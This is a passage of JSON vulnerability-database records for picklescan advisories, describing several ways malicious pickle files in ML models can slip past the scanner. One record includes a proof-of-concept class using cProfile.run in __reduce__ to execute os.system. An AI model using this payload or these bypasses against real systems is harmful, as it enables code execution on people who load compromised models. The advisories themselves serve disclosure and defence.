"url": "http://public2.vulnerablecode.io/api/vulnerabilities/360692?format=api", "vulnerability_id": "VCID-uwy3-anph-f7gv", "summary": "Duplicate Advisory: Remote Code Execution via Malicious Pickle File Bypassing Static Analysis\n## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-655q-fx9r-782v. This link is maintained to preserve external references.\n\n## Original Description\npicklescan before 0.0.21 does not treat 'pip' as an unsafe global. An attacker could craft a malicious model that uses Pickle to pull in a malicious PyPI package (hosted, for example, on pypi.org or GitHub) via `pip.main()`. Because pip is not a restricted global, the model, when scanned with picklescan, would pass security checks and appear to be safe, when it could instead prove to be problematic.", "references": [ { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1716", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1716" }, { "reference_url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1716", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1716" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-655q-fx9r-782v", "reference_id": "GHSA-655q-fx9r-782v", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-655q-fx9r-782v" }, { "reference_url": "https://github.com/advisories/GHSA-vr75-hjh9-7fr6", "reference_id": "GHSA-vr75-hjh9-7fr6", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vr75-hjh9-7fr6" } ], "fixed_packages": [], "aliases": [ "GHSA-vr75-hjh9-7fr6" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-uwy3-anph-f7gv" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360660?format=api", "vulnerability_id": "VCID-v5yc-uwn3-akbc", "summary": "Picklescan is missing detection when calling built-in python cProfile.run\n### Summary\n\nUsing cProfile.run function, which is a built-in python library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to cProfile.run function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nimport cProfile\n\nclass EvilCProfileRun:\n def __reduce__(self):\n # cProfile.run(statement) -> Profile().run(statement) -> exec(statement)\n return cProfile.run, (\"__import__('os').system('whoami')\",)\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/1931c2d04eaca8d20597705ff39cab78ba364e4b", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/1931c2d04eaca8d20597705ff39cab78ba364e4b" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-49gj-c84q-6qm9", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-49gj-c84q-6qm9" }, { "reference_url": "https://github.com/advisories/GHSA-49gj-c84q-6qm9", "reference_id": "GHSA-49gj-c84q-6qm9", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-49gj-c84q-6qm9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89082?format=api", "purl": "pkg:pypi/picklescan@0.0.30", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.30" } ], "aliases": [ "GHSA-49gj-c84q-6qm9" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v5yc-uwn3-akbc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/112668?format=api", "vulnerability_id": "VCID-vgyv-ps7z-x7gc", "summary": "An Improper Handling of Exceptional Conditions vulnerability in the ZIP archive scanning component of mmaitre314 picklescan allows a remote attacker to bypass security scans. This is achieved by crafting a ZIP archive containing a file with a bad Cyclic Redundancy Check (CRC), which causes the scanner to halt and fail to analyze the contents for malicious pickle files. When the file incorrectly considered safe is loaded, it can lead to the execution of malicious code.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-10156", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01284", "scoring_system": "epss", "scoring_elements": "0.80089", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.01284", "scoring_system": "epss", "scoring_elements": "0.80097", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.01284", "scoring_system": "epss", "scoring_elements": "0.80106", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.01284", "scoring_system": "epss", "scoring_elements": "0.80026", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-10156" }, { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/28a7b4ef753466572bda3313737116eeb9b4e5c5", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/28a7b4ef753466572bda3313737116eeb9b4e5c5" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/picklescan/PYSEC-2025-152.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/picklescan/PYSEC-2025-152.yaml" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10156", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10156" }, { "reference_url": "https://github.com/advisories/GHSA-mjqp-26hc-grxg", "reference_id": "GHSA-mjqp-26hc-grxg", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mjqp-26hc-grxg" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-mjqp-26hc-grxg", "reference_id": "GHSA-mjqp-26hc-grxg", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-09-17T13:04:29Z/" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-mjqp-26hc-grxg" }, { "reference_url": "https://huggingface.co/jinaai/jina-embeddings-v2-base-en/tree/main", "reference_id": "main", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-09-17T13:04:29Z/" } ], "url": "https://huggingface.co/jinaai/jina-embeddings-v2-base-en/tree/main" }, { "reference_url": "https://huggingface.co/jinaai/jina-embeddings-v2-base-en/resolve/main/pytorch_model.bin?download=true", "reference_id": "pytorch_model.bin?download=true", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-09-17T13:04:29Z/" } ], "url": "https://huggingface.co/jinaai/jina-embeddings-v2-base-en/resolve/main/pytorch_model.bin?download=true" }, { "reference_url": "https://github.com/mmaitre314/picklescan/blob/v0.0.29/src/picklescan/relaxed_zipfile.py#L35", "reference_id": "relaxed_zipfile.py#L35", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-09-17T13:04:29Z/" } ], "url": "https://github.com/mmaitre314/picklescan/blob/v0.0.29/src/picklescan/relaxed_zipfile.py#L35" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89083?format=api", "purl": "pkg:pypi/picklescan@0.0.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.31" } ], "aliases": [ "CVE-2025-10156", "GHSA-mjqp-26hc-grxg", "PYSEC-2025-152" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vgyv-ps7z-x7gc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/115318?format=api", "vulnerability_id": "VCID-yvv5-7ah5-dfd8", "summary": "picklescan before 0.0.23 fails to detect malicious pickle files inside PyTorch model archives when certain ZIP file flag bits are modified. By flipping specific bits in the ZIP file headers, an attacker can embed malicious pickle files that remain undetected by PickleScan while still being successfully loaded by PyTorch's torch.load(). This can lead to arbitrary code execution when loading a compromised model.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-1945", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00871", "scoring_system": "epss", "scoring_elements": "0.75645", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00871", "scoring_system": "epss", "scoring_elements": "0.75715", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00871", "scoring_system": "epss", "scoring_elements": "0.75723", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00871", "scoring_system": "epss", "scoring_elements": "0.75728", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-1945" }, { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/picklescan/PYSEC-2025-21.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/picklescan/PYSEC-2025-21.yaml" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1945", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1945" }, { "reference_url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1945", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1945" }, { "reference_url": "https://www.sonatype.com/security-advisories/cve-2025-1945", "reference_id": "cve-2025-1945", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-10T12:04:32Z/" } ], "url": "https://www.sonatype.com/security-advisories/cve-2025-1945" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/e58e45e0d9e091159c1554f9b04828bbb40b9781", "reference_id": "e58e45e0d9e091159c1554f9b04828bbb40b9781", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-10T12:04:32Z/" } ], "url": "https://github.com/mmaitre314/picklescan/commit/e58e45e0d9e091159c1554f9b04828bbb40b9781" }, { "reference_url": "https://github.com/advisories/GHSA-w8jq-xcqf-f792", "reference_id": "GHSA-w8jq-xcqf-f792", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-w8jq-xcqf-f792" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-w8jq-xcqf-f792", "reference_id": "GHSA-w8jq-xcqf-f792", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-10T12:04:32Z/" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-w8jq-xcqf-f792" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/87037?format=api", "purl": "pkg:pypi/picklescan@0.0.23", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cce-4mst-r7h4" }, { "vulnerability": "VCID-1cft-ke16-8kac" }, { "vulnerability": "VCID-357d-3wwy-aubk" }, { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-3ykn-199q-u3hf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-4nda-nuz6-gqgm" }, { "vulnerability": "VCID-555e-6p5m-xbbc" }, { "vulnerability": "VCID-6723-ghp7-yqd1" }, { "vulnerability": "VCID-6pqf-4qcr-ckac" }, { "vulnerability": "VCID-6smr-kf6r-53gc" }, { "vulnerability": "VCID-7dgj-c6cm-v3bt" }, { "vulnerability": "VCID-7jv5-uxzs-cucb" }, { "vulnerability": "VCID-83zm-7pnx-gkag" }, { "vulnerability": "VCID-8bj4-tmz9-gyau" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-av36-fvk2-23be" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-b4zf-mwfc-53bm" }, { "vulnerability": "VCID-b8nm-k5xu-yfc8" }, { "vulnerability": "VCID-bepy-gm8w-83e5" }, { "vulnerability": "VCID-brvs-drts-rbay" }, { "vulnerability": "VCID-c3as-vdkf-4fem" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cj2u-dmaj-wbd4" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-cupp-7ca3-wfa6" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-d1k5-6npz-2kcg" }, { "vulnerability": "VCID-d4vv-a8kx-5kdc" }, { "vulnerability": "VCID-dsy5-2z6e-jqds" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fbng-xtyv-zqdf" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fsjg-pn1f-fqd6" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-hm3p-7t8t-bfb7" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-kne4-tcp8-m3c3" }, { "vulnerability": "VCID-n3yg-3gcp-nyc1" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-rqap-hdeb-1ffb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-v5yc-uwn3-akbc" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhdd-ck3x-pbh7" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" }, { "vulnerability": "VCID-zxc5-cgwk-qbcn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.23" } ], "aliases": [ "CVE-2025-1945", "GHSA-w8jq-xcqf-f792", "PYSEC-2025-21" ], "risk_score": 4.4, "exploitability": "0.5", "weighted_severity": "8.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-yvv5-7ah5-dfd8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/112939?format=api", "vulnerability_id": "VCID-zh4p-1c3k-j3g8", "summary": "A Protection Mechanism Failure vulnerability in mmaitre314 picklescan versions up to and including 0.0.30 allows a remote attacker to bypass the unsafe globals check. This is possible because the scanner performs an exact match for module names, allowing malicious payloads to be loaded via submodules of dangerous packages (e.g., 'asyncio.unix_events' instead of 'asyncio'). \n\nWhen the incorrectly considered safe file is loaded after scan, it can lead to the execution of malicious code.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-10157", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00265", "scoring_system": "epss", "scoring_elements": "0.50463", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00265", "scoring_system": "epss", "scoring_elements": "0.50468", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00265", "scoring_system": "epss", "scoring_elements": "0.50482", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00265", "scoring_system": "epss", "scoring_elements": "0.5033", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-10157" }, { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/28a7b4ef753466572bda3313737116eeb9b4e5c5", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L" }, { "value": "9.3", "scoring_system": 